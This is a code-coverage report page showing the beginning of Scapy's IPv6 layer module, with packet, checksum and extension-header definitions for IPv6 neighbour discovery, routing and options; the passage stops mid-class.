Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/inet6.py: 53%
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
7# Cool history about this file: http://natisbad.org/scapy/index.html
10"""
11IPv6 (Internet Protocol v6).
12"""
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen, _ScopedIP
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS, OPENBSD
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import (
77 CookedLinux,
78 Ether,
79 GRE,
80 Loopback,
81 SNAP,
82 SourceMACField,
83)
84from scapy.packet import bind_layers, Packet, Raw
85from scapy.sendrecv import sendp, sniff, sr, srp1
86from scapy.supersocket import SuperSocket
87from scapy.utils import checksum, strxor
88from scapy.pton_ntop import inet_pton, inet_ntop
89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
92from scapy.volatile import RandInt, RandShort
94# Typing
95from typing import (
96 Optional,
97)
99if not socket.has_ipv6:
100 raise socket.error("can't use AF_INET6, IPv6 is disabled")
101if not hasattr(socket, "IPPROTO_IPV6"):
102 # Workaround for http://bugs.python.org/issue6926
103 socket.IPPROTO_IPV6 = 41
104if not hasattr(socket, "IPPROTO_IPIP"):
105 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
106 socket.IPPROTO_IPIP = 4
108if conf.route6 is None:
109 # unused import, only to initialize conf.route6
110 import scapy.route6 # noqa: F401
112##########################
113# Neighbor cache stuff #
114##########################
116conf.netcache.new_cache("in6_neighbor", 120)
119@conf.commands.register
120def neighsol(addr, src, iface, timeout=1, chainCC=0):
121 """Sends and receive an ICMPv6 Neighbor Solicitation message
123 This function sends an ICMPv6 Neighbor Solicitation message
124 to get the MAC address of the neighbor with specified IPv6 address address.
126 'src' address is used as the source IPv6 address of the message. Message
127 is sent on 'iface'. The source MAC address is retrieved accordingly.
129 By default, timeout waiting for an answer is 1 second.
131 If no answer is gathered, None is returned. Else, the answer is
132 returned (ethernet frame).
133 """
135 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
136 d = inet_ntop(socket.AF_INET6, nsma)
137 dm = in6_getnsmac(nsma)
138 sm = get_if_hwaddr(iface)
139 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255)
140 p /= ICMPv6ND_NS(tgt=addr)
141 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm)
142 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
143 chainCC=chainCC)
145 return res
148@conf.commands.register
149def getmacbyip6(ip6, chainCC=0):
150 # type: (str, int) -> Optional[str]
151 """
152 Returns the MAC address of the next hop used to reach a given IPv6 address.
154 neighborCache.get() method is used on instantiated neighbor cache.
155 Resolution mechanism is described in associated doc string.
157 (chainCC parameter value ends up being passed to sending function
158 used to perform the resolution, if needed)
160 .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
161 """
162 # Sanitize the IP
163 if isinstance(ip6, Net6):
164 ip6 = str(ip6)
166 # Multicast
167 if in6_ismaddr(ip6): # mcast @
168 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
169 return mac
171 iff, a, nh = conf.route6.route(ip6)
173 if iff == conf.loopback_name:
174 return "ff:ff:ff:ff:ff:ff"
176 if nh != '::':
177 ip6 = nh # Found next hop
179 mac = conf.netcache.in6_neighbor.get(ip6)
180 if mac:
181 return mac
183 res = neighsol(ip6, a, iff, chainCC=chainCC)
185 if res is not None:
186 if ICMPv6NDOptDstLLAddr in res:
187 mac = res[ICMPv6NDOptDstLLAddr].lladdr
188 else:
189 mac = res.src
190 conf.netcache.in6_neighbor[ip6] = mac
191 return mac
193 return None
196#############################################################################
197#############################################################################
198# IPv6 Class #
199#############################################################################
200#############################################################################
202ipv6nh = {0: "Hop-by-Hop Option Header",
203 4: "IP",
204 6: "TCP",
205 17: "UDP",
206 41: "IPv6",
207 43: "Routing Header",
208 44: "Fragment Header",
209 47: "GRE",
210 50: "ESP Header",
211 51: "AH Header",
212 58: "ICMPv6",
213 59: "No Next Header",
214 60: "Destination Option Header",
215 112: "VRRP",
216 132: "SCTP",
217 135: "Mobility Header"}
219ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
220 4: "IP",
221 6: "TCP",
222 17: "UDP",
223 43: "IPv6ExtHdrRouting",
224 44: "IPv6ExtHdrFragment",
225 50: "ESP",
226 51: "AH",
227 58: "ICMPv6Unknown",
228 59: "Raw",
229 60: "IPv6ExtHdrDestOpt"}
232class IP6ListField(StrField):
233 __slots__ = ["count_from", "length_from"]
234 islist = 1
236 def __init__(self, name, default, count_from=None, length_from=None):
237 if default is None:
238 default = []
239 StrField.__init__(self, name, default)
240 self.count_from = count_from
241 self.length_from = length_from
243 def i2len(self, pkt, i):
244 return 16 * len(i)
246 def i2count(self, pkt, i):
247 if isinstance(i, list):
248 return len(i)
249 return 0
251 def getfield(self, pkt, s):
252 c = tmp_len = None
253 if self.length_from is not None:
254 tmp_len = self.length_from(pkt)
255 elif self.count_from is not None:
256 c = self.count_from(pkt)
258 lst = []
259 ret = b""
260 remain = s
261 if tmp_len is not None:
262 remain, ret = s[:tmp_len], s[tmp_len:]
263 while remain:
264 if c is not None:
265 if c <= 0:
266 break
267 c -= 1
268 addr = inet_ntop(socket.AF_INET6, remain[:16])
269 lst.append(addr)
270 remain = remain[16:]
271 return remain + ret, lst
273 def i2m(self, pkt, x):
274 s = b""
275 for y in x:
276 try:
277 y = inet_pton(socket.AF_INET6, y)
278 except Exception:
279 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
280 y = inet_pton(socket.AF_INET6, y)
281 s += y
282 return s
284 def i2repr(self, pkt, x):
285 s = []
286 if x is None:
287 return "[]"
288 for y in x:
289 s.append('%s' % y)
290 return "[ %s ]" % (", ".join(s))
293class _IPv6GuessPayload:
294 name = "Dummy class that implements guess_payload_class() for IPv6"
296 def default_payload_class(self, p):
297 if self.nh == 58: # ICMPv6
298 t = orb(p[0])
299 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
300 return _niquery_guesser(p)
301 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501
302 if t == 130 and len(p) >= 28:
303 # RFC 3810 - 8.1. Query Version Distinctions
304 return ICMPv6MLQuery2
305 return icmp6typescls.get(t, Raw)
306 return Raw
307 elif self.nh == 135 and len(p) > 3: # Mobile IPv6
308 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
309 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
310 return IPv6ExtHdrSegmentRouting
311 return ipv6nhcls.get(self.nh, Raw)
314class IPv6(_IPv6GuessPayload, Packet, IPTools):
315 name = "IPv6"
316 fields_desc = [BitField("version", 6, 4),
317 BitField("tc", 0, 8),
318 BitField("fl", 0, 20),
319 ShortField("plen", None),
320 ByteEnumField("nh", 59, ipv6nh),
321 ByteField("hlim", 64),
322 SourceIP6Field("src"),
323 DestIP6Field("dst", "::1")]
325 def route(self):
326 """Used to select the L2 address"""
327 dst = self.dst
328 scope = None
329 if isinstance(dst, (Net6, _ScopedIP)):
330 scope = dst.scope
331 if isinstance(dst, (Gen, list)):
332 dst = next(iter(dst))
333 return conf.route6.route(dst, dev=scope)
335 def mysummary(self):
336 return "%s > %s (%i)" % (self.src, self.dst, self.nh)
338 def post_build(self, p, pay):
339 p += pay
340 if self.plen is None:
341 tmp_len = len(p) - 40
342 p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
343 return p
345 def extract_padding(self, data):
346 """Extract the IPv6 payload"""
348 if self.plen == 0 and self.nh == 0 and len(data) >= 8:
349 # Extract Hop-by-Hop extension length
350 hbh_len = orb(data[1])
351 hbh_len = 8 + hbh_len * 8
353 # Extract length from the Jumbogram option
354 # Note: the following algorithm take advantage of the Jumbo option
355 # mandatory alignment (4n + 2, RFC2675 Section 2)
356 jumbo_len = None
357 idx = 0
358 offset = 4 * idx + 2
359 while offset <= len(data):
360 opt_type = orb(data[offset])
361 if opt_type == 0xc2: # Jumbo option
362 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501
363 break
364 offset = 4 * idx + 2
365 idx += 1
367 if jumbo_len is None:
368 log_runtime.info("Scapy did not find a Jumbo option")
369 jumbo_len = 0
371 tmp_len = hbh_len + jumbo_len
372 else:
373 tmp_len = self.plen
375 return data[:tmp_len], data[tmp_len:]
377 def hashret(self):
378 if self.nh == 58 and isinstance(self.payload, _ICMPv6):
379 if self.payload.type < 128:
380 return self.payload.payload.hashret()
381 elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
382 return struct.pack("B", self.nh) + self.payload.hashret()
384 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
385 return self.payload.hashret()
387 nh = self.nh
388 sd = self.dst
389 ss = self.src
390 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
391 # With routing header, the destination is the last
392 # address of the IPv6 list if segleft > 0
393 nh = self.payload.nh
394 try:
395 sd = self.addresses[-1]
396 except IndexError:
397 sd = '::1'
398 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501
399 # could be anything from the original list ...
400 if 1:
401 sd = inet_pton(socket.AF_INET6, sd)
402 for a in self.addresses:
403 a = inet_pton(socket.AF_INET6, a)
404 sd = strxor(sd, a)
405 sd = inet_ntop(socket.AF_INET6, sd)
407 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
408 # With segment routing header (rh == 4), the destination is
409 # the first address of the IPv6 addresses list
410 try:
411 sd = self.addresses[0]
412 except IndexError:
413 sd = self.dst
415 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
416 nh = self.payload.nh
418 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
419 nh = self.payload.nh
421 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
422 foundhao = None
423 for o in self.payload.options:
424 if isinstance(o, HAO):
425 foundhao = o
426 if foundhao:
427 ss = foundhao.hoa
428 nh = self.payload.nh # XXX what if another extension follows ?
430 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
431 sd = inet_pton(socket.AF_INET6, sd)
432 ss = inet_pton(socket.AF_INET6, ss)
433 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501
434 else:
435 return struct.pack("B", nh) + self.payload.hashret()
437 def answers(self, other):
438 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
439 if self.nh in [4, 41]:
440 return self.payload.answers(other)
441 if isinstance(other, IPv6) and other.nh in [4, 41]:
442 return self.answers(other.payload)
443 if isinstance(other, IP) and other.proto in [4, 41]:
444 return self.answers(other.payload)
445 if not isinstance(other, IPv6): # self is reply, other is request
446 return False
447 if conf.checkIPaddr:
448 # ss = inet_pton(socket.AF_INET6, self.src)
449 sd = inet_pton(socket.AF_INET6, self.dst)
450 os = inet_pton(socket.AF_INET6, other.src)
451 od = inet_pton(socket.AF_INET6, other.dst)
452 # request was sent to a multicast address (other.dst)
453 # Check reply destination addr matches request source addr (i.e
454 # sd == os) except when reply is multicasted too
455 # XXX test mcast scope matching ?
456 if in6_ismaddr(other.dst):
457 if in6_ismaddr(self.dst):
458 if ((od == sd) or
459 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501
460 return self.payload.answers(other.payload)
461 return False
462 if (os == sd):
463 return self.payload.answers(other.payload)
464 return False
465 elif (sd != os): # or ss != od): <- removed for ICMP errors
466 return False
467 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501
468 # ICMPv6 Error message -> generated by IPv6 packet
469 # Note : at the moment, we jump the ICMPv6 specific class
470 # to call answers() method of erroneous packet (over
471 # initial packet). There can be cases where an ICMPv6 error
472 # class could implement a specific answers method that perform
473 # a specific task. Currently, don't see any use ...
474 return self.payload.payload.answers(other)
475 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
476 return self.payload.answers(other.payload)
477 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
478 return self.payload.answers(other.payload.payload)
479 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
480 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
481 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
482 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
483 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
484 return self.payload.answers(other.payload.payload)
485 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501
486 return self.payload.payload.answers(other.payload)
487 else:
488 if (self.nh != other.nh):
489 return False
490 return self.payload.answers(other.payload)
493class IPv46(IP, IPv6):
494 """
495 This class implements a dispatcher that is used to detect the IP version
496 while parsing Raw IP pcap files.
497 """
498 name = "IPv4/6"
500 @classmethod
501 def dispatch_hook(cls, _pkt=None, *_, **kargs):
502 if _pkt:
503 if orb(_pkt[0]) >> 4 == 6:
504 return IPv6
505 elif kargs.get("version") == 6:
506 return IPv6
507 return IP
510def inet6_register_l3(l2, l3):
511 """
512 Resolves the default L2 destination address when IPv6 is used.
513 """
514 return getmacbyip6(l3.dst)
517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
520class IPerror6(IPv6):
521 name = "IPv6 in ICMPv6"
523 def answers(self, other):
524 if not isinstance(other, IPv6):
525 return False
526 sd = inet_pton(socket.AF_INET6, self.dst)
527 ss = inet_pton(socket.AF_INET6, self.src)
528 od = inet_pton(socket.AF_INET6, other.dst)
529 os = inet_pton(socket.AF_INET6, other.src)
531 # Make sure that the ICMPv6 error is related to the packet scapy sent
532 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
534 # find upper layer for self (possible citation)
535 selfup = self.payload
536 while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
537 selfup = selfup.payload
539 # find upper layer for other (initial packet). Also look for RH
540 otherup = other.payload
541 request_has_rh = False
542 while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
543 if isinstance(otherup, IPv6ExtHdrRouting):
544 request_has_rh = True
545 otherup = otherup.payload
547 if ((ss == os and sd == od) or # < Basic case
548 (ss == os and request_has_rh)):
549 # ^ Request has a RH : don't check dst address
551 # Let's deal with possible MSS Clamping
552 if (isinstance(selfup, TCP) and
553 isinstance(otherup, TCP) and
554 selfup.options != otherup.options): # seems clamped
556 # Save fields modified by MSS clamping
557 old_otherup_opts = otherup.options
558 old_otherup_cksum = otherup.chksum
559 old_otherup_dataofs = otherup.dataofs
560 old_selfup_opts = selfup.options
561 old_selfup_cksum = selfup.chksum
562 old_selfup_dataofs = selfup.dataofs
564 # Nullify them
565 otherup.options = []
566 otherup.chksum = 0
567 otherup.dataofs = 0
568 selfup.options = []
569 selfup.chksum = 0
570 selfup.dataofs = 0
572 # Test it and save result
573 s1 = raw(selfup)
574 s2 = raw(otherup)
575 tmp_len = min(len(s1), len(s2))
576 res = s1[:tmp_len] == s2[:tmp_len]
578 # recall saved values
579 otherup.options = old_otherup_opts
580 otherup.chksum = old_otherup_cksum
581 otherup.dataofs = old_otherup_dataofs
582 selfup.options = old_selfup_opts
583 selfup.chksum = old_selfup_cksum
584 selfup.dataofs = old_selfup_dataofs
586 return res
588 s1 = raw(selfup)
589 s2 = raw(otherup)
590 tmp_len = min(len(s1), len(s2))
591 return s1[:tmp_len] == s2[:tmp_len]
593 return False
595 def mysummary(self):
596 return Packet.mysummary(self)
599#############################################################################
600#############################################################################
601# Upper Layer Checksum computation #
602#############################################################################
603#############################################################################
605class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
606 name = "Pseudo IPv6 Header"
607 fields_desc = [IP6Field("src", "::"),
608 IP6Field("dst", "::"),
609 IntField("uplen", None),
610 BitField("zero", 0, 24),
611 ByteField("nh", 0)]
614def in6_pseudoheader(nh, u, plen):
615 # type: (int, IP, int) -> PseudoIPv6
616 """
617 Build an PseudoIPv6 instance as specified in RFC 2460 8.1
619 This function operates by filling a pseudo header class instance
620 (PseudoIPv6) with:
621 - Next Header value
622 - the address of _final_ destination (if some Routing Header with non
623 segleft field is present in underlayer classes, last address is used.)
624 - the address of _real_ source (basically the source address of an
625 IPv6 class instance available in the underlayer or the source address
626 in HAO option if some Destination Option header found in underlayer
627 includes this option).
628 - the length is the length of provided payload string ('p')
630 :param nh: value of upper layer protocol
631 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
632 provided with all under layers (IPv6 and all extension headers,
633 for example)
634 :param plen: the length of the upper layer and payload
635 """
636 ph6 = PseudoIPv6()
637 ph6.nh = nh
638 rthdr = 0
639 hahdr = 0
640 final_dest_addr_found = 0
641 while u is not None and not isinstance(u, IPv6):
642 if (isinstance(u, IPv6ExtHdrRouting) and
643 u.segleft != 0 and len(u.addresses) != 0 and
644 final_dest_addr_found == 0):
645 rthdr = u.addresses[-1]
646 final_dest_addr_found = 1
647 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
648 u.segleft != 0 and len(u.addresses) != 0 and
649 final_dest_addr_found == 0):
650 rthdr = u.addresses[0]
651 final_dest_addr_found = 1
652 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
653 isinstance(u.options[0], HAO)):
654 hahdr = u.options[0].hoa
655 u = u.underlayer
656 if u is None:
657 warning("No IPv6 underlayer to compute checksum. Leaving null.")
658 return None
659 if hahdr:
660 ph6.src = hahdr
661 else:
662 ph6.src = u.src
663 if rthdr:
664 ph6.dst = rthdr
665 else:
666 ph6.dst = u.dst
667 ph6.uplen = plen
668 return ph6
671def in6_chksum(nh, u, p):
672 """
673 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
675 See also `.in6_pseudoheader`
677 :param nh: value of upper layer protocol
678 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
679 provided with all under layers (IPv6 and all extension headers,
680 for example)
681 :param p: the payload of the upper layer provided as a string
682 """
683 ph6 = in6_pseudoheader(nh, u, len(p))
684 if ph6 is None:
685 return 0
686 ph6s = raw(ph6)
687 return checksum(ph6s + p)
690#############################################################################
691#############################################################################
692# Extension Headers #
693#############################################################################
694#############################################################################
696nh_clserror = {socket.IPPROTO_TCP: TCPerror,
697 socket.IPPROTO_UDP: UDPerror}
700# Inherited by all extension header classes
701class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
702 name = 'Abstract IPv6 Option Header'
703 aliastypes = [IPv6]
705 def guess_payload_class(self, payload):
706 if self.nh in nh_clserror:
707 underlayer = self.underlayer
708 while underlayer:
709 if isinstance(underlayer, IPerror6):
710 return nh_clserror[self.nh]
711 underlayer = underlayer.underlayer
712 return super(_IPv6ExtHdr, self).guess_payload_class(payload)
715# IPv6 options for Extension Headers #
717_hbhopts = {0x00: "Pad1",
718 0x01: "PadN",
719 0x04: "Tunnel Encapsulation Limit",
720 0x05: "Router Alert",
721 0x06: "Quick-Start",
722 0xc2: "Jumbo Payload",
723 0xc9: "Home Address Option"}
726class _OTypeField(ByteEnumField):
727 """
728 Modified BytEnumField that displays information regarding the IPv6 option
729 based on its option type value (What should be done by nodes that process
730 the option if they do not understand it ...)
732 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
733 """
734 pol = {0x00: "00: skip",
735 0x40: "01: discard",
736 0x80: "10: discard+ICMP",
737 0xC0: "11: discard+ICMP not mcast"}
739 enroutechange = {0x00: "0: Don't change en-route",
740 0x20: "1: May change en-route"}
742 def i2repr(self, pkt, x):
743 s = self.i2s.get(x, repr(x))
744 polstr = self.pol[(x & 0xC0)]
745 enroutechangestr = self.enroutechange[(x & 0x20)]
746 return "%s [%s, %s]" % (s, polstr, enroutechangestr)
749class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
750 name = "Scapy6 Unknown Option"
751 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
752 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
753 StrLenField("optdata", "",
754 length_from=lambda pkt: pkt.optlen)]
756 def alignment_delta(self, curpos): # By default, no alignment requirement
757 """
758 As specified in section 4.2 of RFC 2460, every options has
759 an alignment requirement usually expressed xn+y, meaning
760 the Option Type must appear at an integer multiple of x octets
761 from the start of the header, plus y octets.
763 That function is provided the current position from the
764 start of the header and returns required padding length.
765 """
766 return 0
768 @classmethod
769 def dispatch_hook(cls, _pkt=None, *args, **kargs):
770 if _pkt:
771 o = orb(_pkt[0]) # Option type
772 if o in _hbhoptcls:
773 return _hbhoptcls[o]
774 return cls
776 def extract_padding(self, p):
777 return b"", p
780class Pad1(Packet): # IPv6 Hop-By-Hop Option
781 name = "Pad1"
782 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
784 def alignment_delta(self, curpos): # No alignment requirement
785 return 0
787 def extract_padding(self, p):
788 return b"", p
791class PadN(Packet): # IPv6 Hop-By-Hop Option
792 name = "PadN"
793 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
794 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
795 StrLenField("optdata", "",
796 length_from=lambda pkt: pkt.optlen)]
798 def alignment_delta(self, curpos): # No alignment requirement
799 return 0
801 def extract_padding(self, p):
802 return b"", p
805class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
806 name = "Router Alert"
807 fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
808 ByteField("optlen", 2),
809 ShortEnumField("value", None,
810 {0: "Datagram contains a MLD message",
811 1: "Datagram contains RSVP message",
812 2: "Datagram contains an Active Network message", # noqa: E501
813 68: "NSIS NATFW NSLP",
814 69: "MPLS OAM",
815 65535: "Reserved"})]
816 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501
817 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501
818 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501
819 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
821 def alignment_delta(self, curpos): # alignment requirement : 2n+0
822 x = 2
823 y = 0
824 delta = x * ((curpos - y + x - 1) // x) + y - curpos
825 return delta
827 def extract_padding(self, p):
828 return b"", p
831class RplOption(Packet): # RFC 6553 - RPL Option
832 name = "RPL Option"
833 fields_desc = [_OTypeField("otype", 0x63, _hbhopts),
834 ByteField("optlen", 4),
835 BitField("Down", 0, 1),
836 BitField("RankError", 0, 1),
837 BitField("ForwardError", 0, 1),
838 BitField("unused", 0, 5),
839 XByteField("RplInstanceId", 0),
840 XShortField("SenderRank", 0)]
842 def alignment_delta(self, curpos): # alignment requirement : 2n+0
843 x = 2
844 y = 0
845 delta = x * ((curpos - y + x - 1) // x) + y - curpos
846 return delta
848 def extract_padding(self, p):
849 return b"", p
852class Jumbo(Packet): # IPv6 Hop-By-Hop Option
853 name = "Jumbo Payload"
854 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
855 ByteField("optlen", 4),
856 IntField("jumboplen", None)]
858 def alignment_delta(self, curpos): # alignment requirement : 4n+2
859 x = 4
860 y = 2
861 delta = x * ((curpos - y + x - 1) // x) + y - curpos
862 return delta
864 def extract_padding(self, p):
865 return b"", p
868class HAO(Packet): # IPv6 Destination Options Header Option
869 name = "Home Address Option"
870 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
871 ByteField("optlen", 16),
872 IP6Field("hoa", "::")]
874 def alignment_delta(self, curpos): # alignment requirement : 8n+6
875 x = 8
876 y = 6
877 delta = x * ((curpos - y + x - 1) // x) + y - curpos
878 return delta
880 def extract_padding(self, p):
881 return b"", p
884_hbhoptcls = {0x00: Pad1,
885 0x01: PadN,
886 0x05: RouterAlert,
887 0x63: RplOption,
888 0xC2: Jumbo,
889 0xC9: HAO}
892# Hop-by-Hop Extension Header #
894class _OptionsField(PacketListField):
895 __slots__ = ["curpos"]
897 def __init__(self, name, default, cls, curpos, *args, **kargs):
898 self.curpos = curpos
899 PacketListField.__init__(self, name, default, cls, *args, **kargs)
901 def i2len(self, pkt, i):
902 return len(self.i2m(pkt, i))
904 def i2m(self, pkt, x):
905 autopad = None
906 try:
907 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
908 except Exception:
909 autopad = 1
911 if not autopad:
912 return b"".join(map(bytes, x))
914 curpos = self.curpos
915 s = b""
916 for p in x:
917 d = p.alignment_delta(curpos)
918 curpos += d
919 if d == 1:
920 s += raw(Pad1())
921 elif d != 0:
922 s += raw(PadN(optdata=b'\x00' * (d - 2)))
923 pstr = raw(p)
924 curpos += len(pstr)
925 s += pstr
927 # Let's make the class including our option field
928 # a multiple of 8 octets long
929 d = curpos % 8
930 if d == 0:
931 return s
932 d = 8 - d
933 if d == 1:
934 s += raw(Pad1())
935 elif d != 0:
936 s += raw(PadN(optdata=b'\x00' * (d - 2)))
938 return s
940 def addfield(self, pkt, s, val):
941 return s + self.i2m(pkt, val)
944class _PhantomAutoPadField(ByteField):
945 def addfield(self, pkt, s, val):
946 return s
948 def getfield(self, pkt, s):
949 return s, 1
951 def i2repr(self, pkt, x):
952 if x:
953 return "On"
954 return "Off"
957class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
958 name = "IPv6 Extension Header - Hop-by-Hop Options Header"
959 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
960 FieldLenField("len", None, length_of="options", fmt="B",
961 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
962 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
963 _OptionsField("options", [], HBHOptUnknown, 2,
964 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
965 overload_fields = {IPv6: {"nh": 0}}
968# Destination Option Header #
970class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
971 name = "IPv6 Extension Header - Destination Options Header"
972 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
973 FieldLenField("len", None, length_of="options", fmt="B",
974 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
975 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
976 _OptionsField("options", [], HBHOptUnknown, 2,
977 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
978 overload_fields = {IPv6: {"nh": 60}}
981# Routing Header #
983class IPv6ExtHdrRouting(_IPv6ExtHdr):
984 name = "IPv6 Option Header Routing"
985 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
986 FieldLenField("len", None, count_of="addresses", fmt="B",
987 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501
988 ByteField("type", 0),
989 ByteField("segleft", None),
990 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501
991 IP6ListField("addresses", [],
992 length_from=lambda pkt: 8 * pkt.len)]
993 overload_fields = {IPv6: {"nh": 43}}
995 def post_build(self, pkt, pay):
996 if self.segleft is None:
997 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
998 return _IPv6ExtHdr.post_build(self, pkt, pay)
1001# Segment Routing Header #
1003# This implementation is based on RFC8754, but some older snippets come from:
1004# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
1006_segment_routing_header_tlvs = {
1007 # RFC 8754 sect 8.2
1008 0: "Pad1 TLV",
1009 1: "Ingress Node TLV", # draft 06
1010 2: "Egress Node TLV", # draft 06
1011 4: "PadN TLV",
1012 5: "HMAC TLV",
1013}
1016class IPv6ExtHdrSegmentRoutingTLV(Packet):
1017 name = "IPv6 Option Header Segment Routing - Generic TLV"
1018 # RFC 8754 sect 2.1
1019 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
1020 ByteField("len", 0),
1021 StrLenField("value", "", length_from=lambda pkt: pkt.len)]
1023 def extract_padding(self, p):
1024 return b"", p
1026 registered_sr_tlv = {}
1028 @classmethod
